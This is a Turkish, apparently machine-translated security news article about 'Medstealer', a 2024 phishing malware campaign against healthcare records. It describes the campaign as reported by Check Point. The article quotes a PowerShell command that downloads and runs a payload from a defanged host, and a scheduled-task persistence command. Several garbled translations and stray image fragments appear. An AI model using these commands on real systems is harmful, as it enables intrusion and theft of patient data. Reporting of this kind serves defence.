2024’te sağlık sektörü, benzeri görülmemiş bir siber saldırı dalgasıyla karşı karşıya kaldı ve küresel olarak 276 milyon hasta kaydı ortaya çıktı.
En sinsi tehditler arasında, elektronik sağlık kayıtlarını (EHR’ler), sigorta veritabanlarını ve hasta portallarını hedefleyen kötü amaçlı bir suş olan Medstealer vardı.
İlk olarak 2024’ün başlarında gözlemlenen Medstealer, Legacy Healthcare BT sistemlerinde ve üçüncü taraf satıcı ağlarında güvenlik açıklarından yararlandı.
.png
)
Saldırı vektörleri, ZOCDOC gibi tıbbi platformları taklit eden kimlik avı kampanyalarından SQL enjeksiyon saldırılarına ve Patched sunuculara saldırılara kadar uzanıyordu.
Kötü amaçlı yazılımın birincil amacı, daha sonra kayıt başına 1.000 doları aşan primler için karanlık web pazarlarında satılan kişisel olarak tanımlanabilir bilgileri (PII), sigorta detaylarını ve tıbbi geçmişleri yaymaktı.
Check Point araştırmacıları, randevu onayları veya reçete bildirimleri olarak gizlenmiş mızrak aktı e-postalarına dayanan Medstealer’ın dağıtım ağını belirlediler.
Bu e -postalar, JavaScript Droppers ile gömülü kötü niyetli PDF ekleri içeriyordu.
.webp)
Açıldıktan sonra, komut dosyası bir komut ve kontrol (C2) sunucusundan kötü amaçlı yazılım yükünü indirmek için bir PowerShell komutu başlattı.
Kampanyanın başarısı, ABD’ye dayanan ve e-posta filtrelerini atlamak için tehlikeye atılan sağlık çalışanlarının kimlik bilgilerini kullanan coğrafi olarak hedefleyici kullanıcıları kullanmasından kaynaklandı.
Fallout felaketti: çalınan veriler, sigorta sahtekarlığı, yasadışı reçeteli ilaç satışları ve EHR’ler değiştirildiğinde hayatı tehdit eden tıbbi hatalar bile.
Hastaneler sistem kilitlemeleri nedeniyle tedavilerde gecikmeler bildirirken, hastalar kimlik hırsızlığı davaları ve gasp girişimleriyle karşılaştılar.
Enfeksiyon mekanizması: Sosyal mühendisliği gizlenmiş kodla harmanlamak
Medstealer’ın enfeksiyon zinciri, psikolojik manipülasyonu ileri teknik kaçırma ile birleştirdi. Tipik bir saldırı, başlıklı bir kimlik avı e -postasıyla başladı “Randevunuz hazır!”sahte bir tıbbi kimlik ve harekete geçmek için aciliyet dahil.
Ekli PDF, yükü almak için Base64 kodlu bir URL kullandı:-
$payloadUrl = "hxxps://healthportal[.]care/update.php?ID=ZXhhbXBsZS1iYWQN";
Invoke-WebRequest -Uri $payloadUrl -OutFile $env:Temp\med_update.exe; Start-Process $env:Temp\med_update.exeKötü amaçlı yazılım, kendini meşru pencerelere enjekte etmek için oy kullandı. svchost.exekaçan uç nokta tespiti.
Check Point analistleri, Medstealer’ın yazarlarının verileri yaymak için DNS tünelini kullandığını ve çalınan kayıtları iyi huylu HTTPS trafiği olarak gizlediğini belirtti.
Kalıcılık için, kötü amaçlı yazılım “HealthMonitor” adlı planlanmış bir görev yarattı:-
schtasks /create /tn "HealthMonitor" /tr "C:\Windows\System32\med_update.exe" /sc hourly /mo 12Özellikle, Medstealer DICOM protokollerindeki (tıbbi görüntüleme için kullanılır) güvenlik açıklarından yararlandı ve hastane ağlarında yanal harekete izin verdi.
Saldırganlar, veri hırsızlığı araçlarının yanı sıra fidye yazılımlarını dağıtmak için yanlış yapılandırılmış PAC’leri (resim arşivleme ve iletişim sistemleri) kullandı.
Sağlık ihlallerindeki artış, sıfır tröst mimarilerine ve AI odaklı anomali tespitine olan ihtiyacı vurgulamaktadır.
Check Point’in Harmony E-posta ve İşbirliği Suite, 2024 yılında 7.000’den fazla Medstealer bağlantılı kimlik avı denemesini engelledi ve uyarlanabilir e-posta güvenliğinin kritik rolünü vurguladı.
Siber suçlular taktiklerini geliştirdikçe, sağlık kuruluşları hassas hasta verilerini korumak için yama yönetimine, çalışan eğitimine ve çok katmanlı tehdidi önlemeye öncelik vermelidir.
How SOC Teams Save Time and Effort with ANY.RUN - Live webinar for SOC teams and managers